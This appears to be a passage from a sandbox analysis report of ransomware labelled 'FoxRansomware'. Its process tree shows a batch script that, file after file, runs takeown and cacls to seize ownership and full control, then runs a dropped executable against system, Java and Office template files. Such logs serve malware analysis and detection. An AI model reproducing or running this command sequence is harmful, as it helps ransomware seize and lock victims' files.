PID:6776
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6704
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db""2⤵PID:7048
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db" /E /G Admin:F /C3⤵PID:6828
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "SmsInterceptStore.db" -nobanner3⤵PID:1388
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "SmsInterceptStore.db" -nobanner4⤵
- Executes dropped EXE
PID:7544
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7576
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""2⤵PID:7176
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵PID:7860
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵PID:6968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "store.db" -nobanner3⤵PID:7308
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "store.db" -nobanner4⤵
- Executes dropped EXE
PID:7608
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7476
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa""2⤵PID:7456
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:8132
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa"3⤵PID:8148
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "classes.jsa" -nobanner3⤵PID:5764
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "classes.jsa" -nobanner4⤵PID:2196
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5704
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa""2⤵PID:3940
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:7532
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa"3⤵PID:8184
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "classes.jsa" -nobanner3⤵PID:5876
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:5228
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2068
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner3⤵
- Executes dropped EXE
PID:5900
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml""2⤵PID:6948
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml" /E /G Admin:F /C3⤵PID:6284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "AssemblyList_4_client.xml" -nobanner3⤵PID:7496
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "AssemblyList_4_client.xml" -nobanner4⤵
- Executes dropped EXE
PID:7820
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7580
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""2⤵PID:6092
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C3⤵PID:6004
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "behavior.xml" -nobanner3⤵PID:2780
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "behavior.xml" -nobanner4⤵
- Executes dropped EXE
PID:5268
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2924
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""2⤵PID:6312
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:6224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:7136
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner3⤵PID:7096
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml""2⤵PID:6252
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml" /E /G Admin:F /C3⤵PID:6544
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner3⤵PID:6636
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner4⤵
- Executes dropped EXE
PID:6548
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6076
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml""2⤵PID:2636
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml" /E /G Admin:F /C3⤵PID:6988
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml"3⤵PID:5256
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner3⤵PID:2724
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner4⤵
- Executes dropped EXE
PID:3956
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6644
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml""2⤵PID:6464
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml" /E /G Admin:F /C3⤵PID:6584
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml"3⤵
- Modifies file permissions
PID:7568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftWordpad.xml" -nobanner3⤵PID:896
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftWordpad.xml" -nobanner4⤵
- Executes dropped EXE
PID:6808
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7692
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:5800
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:6828
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6856
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "device.png" -nobanner3⤵PID:7468
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "device.png" -nobanner4⤵
- Executes dropped EXE
PID:6784
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7556
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""2⤵PID:6068
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:1388
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:8096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner3⤵PID:6572
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:6528
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5624
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""2⤵PID:3660
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C3⤵PID:7788
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "tasks.xml" -nobanner3⤵PID:6772
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "tasks.xml" -nobanner4⤵
- Executes dropped EXE
PID:2392
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7464
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.07e0391e-b16c-4bb2-b4c0-5395dd159cd1.1.etl""2⤵PID:7120
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\WuProvider.07e0391e-b16c-4bb2-b4c0-5395dd159cd1.1.etl" /E /G Admin:F /C3⤵PID:7648
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.07e0391e-b16c-4bb2-b4c0-5395dd159cd1.1.etl"3⤵
- Modifies file permissions
PID:7644
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "WuProvider.07e0391e-b16c-4bb2-b4c0-5395dd159cd1.1.etl" -nobanner3⤵PID:7672
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "WuProvider.07e0391e-b16c-4bb2-b4c0-5395dd159cd1.1.etl" -nobanner4⤵PID:7728
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml""2⤵PID:1740
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml" /E /G Admin:F /C3⤵PID:1300
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml"3⤵
- Modifies file permissions
PID:6164
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner3⤵PID:7932
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner4⤵
- Executes dropped EXE
PID:8056
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7824
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml""2⤵PID:8032
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml" /E /G Admin:F /C3⤵PID:7280
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner3⤵PID:7860
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner4⤵
- Executes dropped EXE
PID:7580
-
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:8100
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7880
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml""2⤵PID:7924
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml" /E /G Admin:F /C3⤵PID:7540
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner3⤵PID:7420
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner4⤵
- Executes dropped EXE
PID:7448
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:8112
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""2⤵PID:7956
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner3⤵PID:5600
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner4⤵
- Executes dropped EXE
PID:6948
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7104
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:8068
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C3⤵PID:7724
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:7660
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵
- Modifies file permissions
PID:5444
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:8140
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "background.png" -nobanner3⤵PID:5736
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7740
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""2⤵PID:8084
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:6156
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"3⤵PID:5984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner3⤵
- Executes dropped EXE
PID:2196 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:5712
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5820
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""2⤵PID:7664
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:6020
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"3⤵PID:5732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner3⤵PID:6192
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:5784
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5096
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml""2⤵PID:7684
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml" /E /G Admin:F /C3⤵PID:4496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml"3⤵PID:1548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "DesktopSettings2013.xml" -nobanner3⤵PID:5936
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml""2⤵PID:5036
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml"3⤵PID:5776
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner3⤵PID:3940
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml" /E /G Admin:F /C3⤵PID:1468
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml""2⤵PID:1228
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml" /E /G Admin:F /C3⤵PID:4396
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml"3⤵
- Modifies file permissions
PID:7232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner3⤵PID:3620
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner4⤵
- Executes dropped EXE
PID:6112
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6936
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml""2⤵PID:6824
-
